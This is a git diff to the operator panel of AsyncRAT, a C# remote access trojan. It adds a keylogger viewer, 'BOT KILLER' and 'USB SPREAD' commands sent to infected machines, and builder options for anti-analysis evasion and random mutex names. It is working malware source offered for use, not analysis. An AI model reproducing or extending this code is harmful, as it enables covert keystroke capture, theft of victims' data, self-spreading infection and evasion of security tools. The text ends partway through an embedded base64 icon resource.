diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
index e09c6dd..aa78eac 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
@@ -45,6 +45,7 @@
..\packages\dnlib.3.2.0\lib\net45\dnlib.dll
+ True
@@ -79,6 +80,12 @@
Form1.cs
+
+ Form
+
+
+ Keylogger.cs
+
Form
@@ -166,6 +173,9 @@
Form1.cs
+
+ Keylogger.cs
+
PortsFrm.cs
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.Designer.cs
index 05b3d49..2851314 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.Designer.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.Designer.cs
@@ -36,20 +36,23 @@
this.label2 = new System.Windows.Forms.Label();
this.label1 = new System.Windows.Forms.Label();
this.groupBox2 = new System.Windows.Forms.GroupBox();
+ this.comboBoxFolder = new System.Windows.Forms.ComboBox();
+ this.checkBox1 = new System.Windows.Forms.CheckBox();
this.textFilename = new System.Windows.Forms.TextBox();
this.label3 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
- this.checkBox1 = new System.Windows.Forms.CheckBox();
- this.comboBoxFolder = new System.Windows.Forms.ComboBox();
+ this.groupBox3 = new System.Windows.Forms.GroupBox();
+ this.chkAnti = new System.Windows.Forms.CheckBox();
this.groupBox1.SuspendLayout();
this.groupBox2.SuspendLayout();
+ this.groupBox3.SuspendLayout();
this.SuspendLayout();
//
// button1
//
- this.button1.Location = new System.Drawing.Point(16, 456);
+ this.button1.Location = new System.Drawing.Point(12, 611);
this.button1.Name = "button1";
- this.button1.Size = new System.Drawing.Size(440, 50);
+ this.button1.Size = new System.Drawing.Size(446, 50);
this.button1.TabIndex = 0;
this.button1.Text = "Build";
this.button1.UseVisualStyleBackColor = true;
@@ -114,6 +117,30 @@
this.groupBox2.TabStop = false;
this.groupBox2.Text = "Install";
//
+ // comboBoxFolder
+ //
+ this.comboBoxFolder.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.comboBoxFolder.Enabled = false;
+ this.comboBoxFolder.FormattingEnabled = true;
+ this.comboBoxFolder.Items.AddRange(new object[] {
+ "%AppData%",
+ "%Temp%"});
+ this.comboBoxFolder.Location = new System.Drawing.Point(106, 150);
+ this.comboBoxFolder.Name = "comboBoxFolder";
+ this.comboBoxFolder.Size = new System.Drawing.Size(271, 28);
+ this.comboBoxFolder.TabIndex = 8;
+ //
+ // checkBox1
+ //
+ this.checkBox1.AutoSize = true;
+ this.checkBox1.Location = new System.Drawing.Point(18, 40);
+ this.checkBox1.Name = "checkBox1";
+ this.checkBox1.Size = new System.Drawing.Size(67, 24);
+ this.checkBox1.TabIndex = 7;
+ this.checkBox1.Text = "OFF";
+ this.checkBox1.UseVisualStyleBackColor = true;
+ this.checkBox1.CheckedChanged += new System.EventHandler(this.checkBox1_CheckedChanged);
+ //
// textFilename
//
this.textFilename.Enabled = false;
@@ -140,35 +167,34 @@
this.label4.TabIndex = 4;
this.label4.Text = "Filename";
//
- // checkBox1
+ // groupBox3
//
- this.checkBox1.AutoSize = true;
- this.checkBox1.Location = new System.Drawing.Point(18, 40);
- this.checkBox1.Name = "checkBox1";
- this.checkBox1.Size = new System.Drawing.Size(67, 24);
- this.checkBox1.TabIndex = 7;
- this.checkBox1.Text = "OFF";
- this.checkBox1.UseVisualStyleBackColor = true;
- this.checkBox1.CheckedChanged += new System.EventHandler(this.checkBox1_CheckedChanged);
+ this.groupBox3.Controls.Add(this.chkAnti);
+ this.groupBox3.Location = new System.Drawing.Point(16, 468);
+ this.groupBox3.Name = "groupBox3";
+ this.groupBox3.Size = new System.Drawing.Size(440, 99);
+ this.groupBox3.TabIndex = 9;
+ this.groupBox3.TabStop = false;
+ this.groupBox3.Text = "MISC";
//
- // comboBoxFolder
+ // chkAnti
//
- this.comboBoxFolder.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
- this.comboBoxFolder.Enabled = false;
- this.comboBoxFolder.FormattingEnabled = true;
- this.comboBoxFolder.Items.AddRange(new object[] {
- "%AppData%",
- "%Temp%"});
- this.comboBoxFolder.Location = new System.Drawing.Point(106, 150);
- this.comboBoxFolder.Name = "comboBoxFolder";
- this.comboBoxFolder.Size = new System.Drawing.Size(271, 28);
- this.comboBoxFolder.TabIndex = 8;
+ this.chkAnti.AutoSize = true;
+ this.chkAnti.Checked = true;
+ this.chkAnti.CheckState = System.Windows.Forms.CheckState.Checked;
+ this.chkAnti.Location = new System.Drawing.Point(21, 40);
+ this.chkAnti.Name = "chkAnti";
+ this.chkAnti.Size = new System.Drawing.Size(125, 24);
+ this.chkAnti.TabIndex = 9;
+ this.chkAnti.Text = "Anti Analysis";
+ this.chkAnti.UseVisualStyleBackColor = true;
//
// Builder
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
- this.ClientSize = new System.Drawing.Size(470, 518);
+ this.ClientSize = new System.Drawing.Size(470, 693);
+ this.Controls.Add(this.groupBox3);
this.Controls.Add(this.groupBox2);
this.Controls.Add(this.groupBox1);
this.Controls.Add(this.button1);
@@ -180,6 +206,8 @@
this.groupBox1.PerformLayout();
this.groupBox2.ResumeLayout(false);
this.groupBox2.PerformLayout();
+ this.groupBox3.ResumeLayout(false);
+ this.groupBox3.PerformLayout();
this.ResumeLayout(false);
}
@@ -198,5 +226,7 @@
private System.Windows.Forms.Label label4;
private System.Windows.Forms.CheckBox checkBox1;
private System.Windows.Forms.ComboBox comboBoxFolder;
+ private System.Windows.Forms.GroupBox groupBox3;
+ private System.Windows.Forms.CheckBox chkAnti;
}
}
\ No newline at end of file
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.cs
index e112147..8f63445 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.cs
@@ -52,6 +52,12 @@ namespace AsyncRAT_Sharp.Forms
if (method.Body.Instructions[i].Operand.ToString() == "false")
method.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower();
+ if (method.Body.Instructions[i].Operand.ToString() == "%Anti%")
+ method.Body.Instructions[i].Operand = chkAnti.Checked.ToString().ToLower();
+
+ if (method.Body.Instructions[i].Operand.ToString() == "%MTX%")
+ method.Body.Instructions[i].Operand = Path.GetRandomFileName();
+
if (method.Body.Instructions[i].Operand.ToString() == "NYAN CAT")
method.Body.Instructions[i].Operand = Settings.Password;
}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.cs
index 1595d65..0807a38 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.cs
@@ -20,11 +20,11 @@ namespace AsyncRAT_Sharp.Forms
public Form1 F { get; set; }
internal Clients C { get; set; }
- public long Size = 0;
+ public long dSize = 0;
private void timer1_Tick(object sender, EventArgs e)
{
- labelsize.Text = $"{Methods.BytesToString(Size)} \\ {Methods.BytesToString(C.BytesRecevied)}";
- if (C.BytesRecevied > Size)
+ labelsize.Text = $"{Methods.BytesToString(dSize)} \\ {Methods.BytesToString(C.BytesRecevied)}";
+ if (C.BytesRecevied > dSize)
{
labelsize.Text = "Downloaded";
labelsize.ForeColor = Color.Green;
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.cs
index 50fb303..fd6847f 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.cs
@@ -120,9 +120,7 @@ namespace AsyncRAT_Sharp.Forms
ThreadPool.QueueUserWorkItem(C.BeginSend, msgpack.Encode2Bytes());
}
}
- catch (Exception ex)
- {
- }
+ catch { }
}
private void dELETEToolStripMenuItem_Click(object sender, EventArgs e)
@@ -142,10 +140,7 @@ namespace AsyncRAT_Sharp.Forms
}
}
}
- catch
- {
-
- }
+ catch { }
}
private void rEFRESHToolStripMenuItem_Click(object sender, EventArgs e)
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
index 179cef9..c446b3b 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
@@ -47,10 +47,13 @@
this.sENDFILEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sENDFILETOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.rEMOTEDESKTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.kEYLOGGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.fILEMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.bOTKILLERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.uSBSPREADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator();
this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.fILEMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.ping = new System.Windows.Forms.Timer(this.components);
@@ -61,11 +64,15 @@
this.listView2 = new System.Windows.Forms.ListView();
this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
+ this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
this.contextMenuStrip1.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.tabControl1.SuspendLayout();
this.tabPage1.SuspendLayout();
this.tabPage2.SuspendLayout();
+ ((System.ComponentModel.ISupportInitialize)(this.performanceCounter1)).BeginInit();
+ ((System.ComponentModel.ISupportInitialize)(this.performanceCounter2)).BeginInit();
this.SuspendLayout();
//
// listView1
@@ -133,12 +140,16 @@
this.sENDFILEToolStripMenuItem,
this.sENDFILETOMEMORYToolStripMenuItem,
this.rEMOTEDESKTOPToolStripMenuItem,
+ this.kEYLOGGERToolStripMenuItem,
this.fILEMANAGERToolStripMenuItem,
this.pROCESSMANAGERToolStripMenuItem,
+ this.bOTKILLERToolStripMenuItem,
+ this.uSBSPREADToolStripMenuItem,
this.toolStripSeparator2,
this.bUILDERToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
- this.contextMenuStrip1.Size = new System.Drawing.Size(275, 256);
+ this.contextMenuStrip1.ShowImageMargin = false;
+ this.contextMenuStrip1.Size = new System.Drawing.Size(275, 346);
//
// cLIENTOPTIONSToolStripMenuItem
//
@@ -148,7 +159,7 @@
this.uNISTALLToolStripMenuItem});
this.cLIENTOPTIONSToolStripMenuItem.Name = "cLIENTOPTIONSToolStripMenuItem";
this.cLIENTOPTIONSToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
- this.cLIENTOPTIONSToolStripMenuItem.Text = "CLIENT OPTIONS";
+ this.cLIENTOPTIONSToolStripMenuItem.Text = "[$] CLIENT OPTIONS";
//
// cLOSEToolStripMenuItem
//
@@ -180,37 +191,65 @@
//
this.sENDMESSAGEBOXToolStripMenuItem.Name = "sENDMESSAGEBOXToolStripMenuItem";
this.sENDMESSAGEBOXToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
- this.sENDMESSAGEBOXToolStripMenuItem.Text = "SEND MESSAGEBOX";
+ this.sENDMESSAGEBOXToolStripMenuItem.Text = "[1] SEND MESSAGEBOX";
this.sENDMESSAGEBOXToolStripMenuItem.Click += new System.EventHandler(this.sENDMESSAGEBOXToolStripMenuItem_Click);
//
// sENDFILEToolStripMenuItem
//
this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem";
this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
- this.sENDFILEToolStripMenuItem.Text = "SEND FILE TO DISK";
+ this.sENDFILEToolStripMenuItem.Text = "[2] SEND FILE TO DISK";
this.sENDFILEToolStripMenuItem.Click += new System.EventHandler(this.sENDFILEToolStripMenuItem_Click_1);
//
// sENDFILETOMEMORYToolStripMenuItem
//
this.sENDFILETOMEMORYToolStripMenuItem.Name = "sENDFILETOMEMORYToolStripMenuItem";
this.sENDFILETOMEMORYToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
- this.sENDFILETOMEMORYToolStripMenuItem.Text = "SEND FILE TO MEMORY";
+ this.sENDFILETOMEMORYToolStripMenuItem.Text = "[3] SEND FILE TO MEMORY";
this.sENDFILETOMEMORYToolStripMenuItem.Click += new System.EventHandler(this.sENDFILETOMEMORYToolStripMenuItem_Click);
//
// rEMOTEDESKTOPToolStripMenuItem
//
this.rEMOTEDESKTOPToolStripMenuItem.Name = "rEMOTEDESKTOPToolStripMenuItem";
this.rEMOTEDESKTOPToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
- this.rEMOTEDESKTOPToolStripMenuItem.Text = "REMOTE DESKTOP";
+ this.rEMOTEDESKTOPToolStripMenuItem.Text = "[4] REMOTE DESKTOP";
this.rEMOTEDESKTOPToolStripMenuItem.Click += new System.EventHandler(this.rEMOTEDESKTOPToolStripMenuItem_Click);
//
+ // kEYLOGGERToolStripMenuItem
+ //
+ this.kEYLOGGERToolStripMenuItem.Name = "kEYLOGGERToolStripMenuItem";
+ this.kEYLOGGERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
+ this.kEYLOGGERToolStripMenuItem.Text = "[5] KEYLOGGER";
+ this.kEYLOGGERToolStripMenuItem.Click += new System.EventHandler(this.KEYLOGGERToolStripMenuItem_Click);
+ //
+ // fILEMANAGERToolStripMenuItem
+ //
+ this.fILEMANAGERToolStripMenuItem.Name = "fILEMANAGERToolStripMenuItem";
+ this.fILEMANAGERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
+ this.fILEMANAGERToolStripMenuItem.Text = "[6] FILE MANAGER";
+ this.fILEMANAGERToolStripMenuItem.Click += new System.EventHandler(this.fILEMANAGERToolStripMenuItem_Click);
+ //
// pROCESSMANAGERToolStripMenuItem
//
this.pROCESSMANAGERToolStripMenuItem.Name = "pROCESSMANAGERToolStripMenuItem";
this.pROCESSMANAGERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
- this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER";
+ this.pROCESSMANAGERToolStripMenuItem.Text = "[7] PROCESS MANAGER";
this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click);
//
+ // bOTKILLERToolStripMenuItem
+ //
+ this.bOTKILLERToolStripMenuItem.Name = "bOTKILLERToolStripMenuItem";
+ this.bOTKILLERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
+ this.bOTKILLERToolStripMenuItem.Text = "[8] BOT KILLER";
+ this.bOTKILLERToolStripMenuItem.Click += new System.EventHandler(this.BOTKILLERToolStripMenuItem_Click);
+ //
+ // uSBSPREADToolStripMenuItem
+ //
+ this.uSBSPREADToolStripMenuItem.Name = "uSBSPREADToolStripMenuItem";
+ this.uSBSPREADToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
+ this.uSBSPREADToolStripMenuItem.Text = "[9] USB SPREAD";
+ this.uSBSPREADToolStripMenuItem.Click += new System.EventHandler(this.USBSPREADToolStripMenuItem_Click);
+ //
// toolStripSeparator2
//
this.toolStripSeparator2.Name = "toolStripSeparator2";
@@ -220,16 +259,9 @@
//
this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem";
this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
- this.bUILDERToolStripMenuItem.Text = "BUILDER";
+ this.bUILDERToolStripMenuItem.Text = "[#] BUILDER";
this.bUILDERToolStripMenuItem.Click += new System.EventHandler(this.bUILDERToolStripMenuItem_Click);
//
- // fILEMANAGERToolStripMenuItem
- //
- this.fILEMANAGERToolStripMenuItem.Name = "fILEMANAGERToolStripMenuItem";
- this.fILEMANAGERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
- this.fILEMANAGERToolStripMenuItem.Text = "FILE MANAGER";
- this.fILEMANAGERToolStripMenuItem.Click += new System.EventHandler(this.fILEMANAGERToolStripMenuItem_Click);
- //
// statusStrip1
//
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
@@ -256,7 +288,7 @@
// UpdateUI
//
this.UpdateUI.Enabled = true;
- this.UpdateUI.Interval = 1000;
+ this.UpdateUI.Interval = 500;
this.UpdateUI.Tick += new System.EventHandler(this.UpdateUI_Tick);
//
// tabControl1
@@ -321,6 +353,17 @@
this.columnHeader2.Text = "Message";
this.columnHeader2.Width = 500;
//
+ // performanceCounter1
+ //
+ this.performanceCounter1.CategoryName = "Processor";
+ this.performanceCounter1.CounterName = "% Processor Time";
+ this.performanceCounter1.InstanceName = "_Total";
+ //
+ // performanceCounter2
+ //
+ this.performanceCounter2.CategoryName = "Memory";
+ this.performanceCounter2.CounterName = "% Committed Bytes In Use";
+ //
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@@ -340,6 +383,8 @@
this.tabControl1.ResumeLayout(false);
this.tabPage1.ResumeLayout(false);
this.tabPage2.ResumeLayout(false);
+ ((System.ComponentModel.ISupportInitialize)(this.performanceCounter1)).EndInit();
+ ((System.ComponentModel.ISupportInitialize)(this.performanceCounter2)).EndInit();
this.ResumeLayout(false);
this.PerformLayout();
@@ -378,6 +423,11 @@
private System.Windows.Forms.ColumnHeader columnHeader1;
private System.Windows.Forms.ColumnHeader columnHeader2;
private System.Windows.Forms.ToolStripMenuItem fILEMANAGERToolStripMenuItem;
+ private System.Windows.Forms.ToolStripMenuItem kEYLOGGERToolStripMenuItem;
+ private System.Windows.Forms.ToolStripMenuItem bOTKILLERToolStripMenuItem;
+ private System.Windows.Forms.ToolStripMenuItem uSBSPREADToolStripMenuItem;
+ private System.Diagnostics.PerformanceCounter performanceCounter1;
+ private System.Diagnostics.PerformanceCounter performanceCounter2;
}
}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
index 20c3c05..8ad7b62 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
@@ -134,7 +134,7 @@ namespace AsyncRAT_Sharp
private void UpdateUI_Tick(object sender, EventArgs e)
{
- toolStripStatusLabel1.Text = $"Online {Settings.Online.Count.ToString()} Selected {listView1.SelectedItems.Count.ToString()} Sent {Methods.BytesToString(Settings.Sent).ToString()} Received {Methods.BytesToString(Settings.Received).ToString()}";
+ toolStripStatusLabel1.Text = $"Online {Settings.Online.Count.ToString()} Selected {listView1.SelectedItems.Count.ToString()} Sent {Methods.BytesToString(Settings.Sent).ToString()} Received {Methods.BytesToString(Settings.Received).ToString()} CPU {(int)performanceCounter1.NextValue()}% RAM {(int)performanceCounter2.NextValue()}%";
}
private void cLOSEToolStripMenuItem_Click(object sender, EventArgs e)
@@ -304,8 +304,6 @@ namespace AsyncRAT_Sharp
foreach (ListViewItem C in listView1.SelectedItems)
{
Clients CL = (Clients)C.Tag;
- ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
-
this.BeginInvoke((MethodInvoker)(() =>
{
RemoteDesktop RD = (RemoteDesktop)Application.OpenForms["RemoteDesktop:" + CL.ID];
@@ -320,6 +318,7 @@ namespace AsyncRAT_Sharp
Active = true
};
RD.Show();
+ ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
}
}));
}
@@ -344,7 +343,6 @@ namespace AsyncRAT_Sharp
foreach (ListViewItem C in listView1.SelectedItems)
{
Clients CL = (Clients)C.Tag;
- ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
this.BeginInvoke((MethodInvoker)(() =>
{
ProcessManager PM = (ProcessManager)Application.OpenForms["processManager:" + CL.ID];
@@ -358,6 +356,7 @@ namespace AsyncRAT_Sharp
C = CL
};
PM.Show();
+ ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
}
}));
}
@@ -386,7 +385,6 @@ namespace AsyncRAT_Sharp
foreach (ListViewItem C in listView1.SelectedItems)
{
Clients CL = (Clients)C.Tag;
- ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
this.BeginInvoke((MethodInvoker)(() =>
{
FileManager FM = (FileManager)Application.OpenForms["fileManager:" + CL.ID];
@@ -400,6 +398,7 @@ namespace AsyncRAT_Sharp
C = CL
};
FM.Show();
+ ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
}
}));
}
@@ -410,5 +409,84 @@ namespace AsyncRAT_Sharp
MessageBox.Show(ex.Message);
}
}
+
+ private void KEYLOGGERToolStripMenuItem_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ if (listView1.SelectedItems.Count > 0)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "keyLogger";
+ msgpack.ForcePathObject("isON").AsString = "true";
+ foreach (ListViewItem C in listView1.SelectedItems)
+ {
+ Clients CL = (Clients)C.Tag;
+ this.BeginInvoke((MethodInvoker)(() =>
+ {
+ Keylogger KL = (Keylogger)Application.OpenForms["keyLogger:" + CL.ID];
+ if (KL == null)
+ {
+ KL = new Keylogger
+ {
+ Name = "keyLogger:" + CL.ID,
+ Text = "keyLogger:" + CL.ID,
+ F = this,
+ C = CL
+ };
+ KL.Show();
+ ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
+ }
+ }));
+ }
+ }
+ }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ }
+ }
+
+ private void BOTKILLERToolStripMenuItem_Click(object sender, EventArgs e)
+ {
+ if (listView1.SelectedItems.Count > 0)
+ {
+ try
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "botKiller";
+ foreach (ListViewItem C in listView1.SelectedItems)
+ {
+ Clients CL = (Clients)C.Tag;
+ ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
+ }
+ }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ }
+ }
+ }
+
+ private void USBSPREADToolStripMenuItem_Click(object sender, EventArgs e)
+ {
+ if (listView1.SelectedItems.Count > 0)
+ {
+ try
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "usbSpread";
+ foreach (ListViewItem C in listView1.SelectedItems)
+ {
+ Clients CL = (Clients)C.Tag;
+ ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
+ }
+ }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ }
+ }
+ }
}
}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.resx
index 174be44..165d9f9 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.resx
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.resx
@@ -129,6 +129,12 @@
490, 17
+
+ 629, 17
+
+
+ 871, 17
+
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Keylogger.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Keylogger.Designer.cs
new file mode 100644
index 0000000..e30bcaf
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Keylogger.Designer.cs
@@ -0,0 +1,74 @@
+namespace AsyncRAT_Sharp.Forms
+{
+ partial class Keylogger
+ {
+ ///
+ /// Required designer variable.
+ ///
+ private System.ComponentModel.IContainer components = null;
+
+ ///
+ /// Clean up any resources being used.
+ ///
+ /// true if managed resources should be disposed; otherwise, false.
+ protected override void Dispose(bool disposing)
+ {
+ if (disposing && (components != null))
+ {
+ components.Dispose();
+ }
+ base.Dispose(disposing);
+ }
+
+ #region Windows Form Designer generated code
+
+ ///
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
+ ///
+ private void InitializeComponent()
+ {
+ this.components = new System.ComponentModel.Container();
+ System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Keylogger));
+ this.richTextBox1 = new System.Windows.Forms.RichTextBox();
+ this.timer1 = new System.Windows.Forms.Timer(this.components);
+ this.SuspendLayout();
+ //
+ // richTextBox1
+ //
+ this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
+ this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.richTextBox1.Font = new System.Drawing.Font("Tahoma", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
+ this.richTextBox1.Location = new System.Drawing.Point(0, 0);
+ this.richTextBox1.Name = "richTextBox1";
+ this.richTextBox1.ReadOnly = true;
+ this.richTextBox1.ShortcutsEnabled = false;
+ this.richTextBox1.Size = new System.Drawing.Size(800, 450);
+ this.richTextBox1.TabIndex = 0;
+ this.richTextBox1.Text = "";
+ //
+ // timer1
+ //
+ this.timer1.Enabled = true;
+ this.timer1.Interval = 1000;
+ this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
+ //
+ // Keylogger
+ //
+ this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
+ this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
+ this.ClientSize = new System.Drawing.Size(800, 450);
+ this.Controls.Add(this.richTextBox1);
+ this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
+ this.Name = "Keylogger";
+ this.Text = "Keylogger";
+ this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.Keylogger_FormClosed);
+ this.ResumeLayout(false);
+
+ }
+
+ #endregion
+ private System.Windows.Forms.Timer timer1;
+ public System.Windows.Forms.RichTextBox richTextBox1;
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Keylogger.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Keylogger.cs
new file mode 100644
index 0000000..700bedd
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Keylogger.cs
@@ -0,0 +1,38 @@
+using AsyncRAT_Sharp.MessagePack;
+using AsyncRAT_Sharp.Sockets;
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+using System.Windows.Forms;
+
+namespace AsyncRAT_Sharp.Forms
+{
+ public partial class Keylogger : Form
+ {
+ public Keylogger()
+ {
+ InitializeComponent();
+ }
+
+ public Form1 F { get; set; }
+ internal Clients C { get; set; }
+
+ private void Timer1_Tick(object sender, EventArgs e)
+ {
+ if (!C.ClientSocket.Connected) this.Close();
+ }
+
+ private void Keylogger_FormClosed(object sender, FormClosedEventArgs e)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "keyLogger";
+ msgpack.ForcePathObject("Log").AsString = "false";
+ C.BeginSend(msgpack.Encode2Bytes());
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Keylogger.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Keylogger.resx
new file mode 100644
index 0000000..e9b4dee
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Keylogger.resx
@@ -0,0 +1,580 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ 17, 17
+
+
+
+
+ AAABAAUAEBAAAAEAIABoBAAAVgAAABgYAAABACAAiAkAAL4EAAAgIAAAAQAgAKgQAABGDgAAMDAAAAEA
+ IACoJQAA7h4AAAAAAAABACAAHyUAAJZEAAAoAAAAEAAAACAAAAABACAAAAAAAAAEAAAAAAAAAAAAAAAA
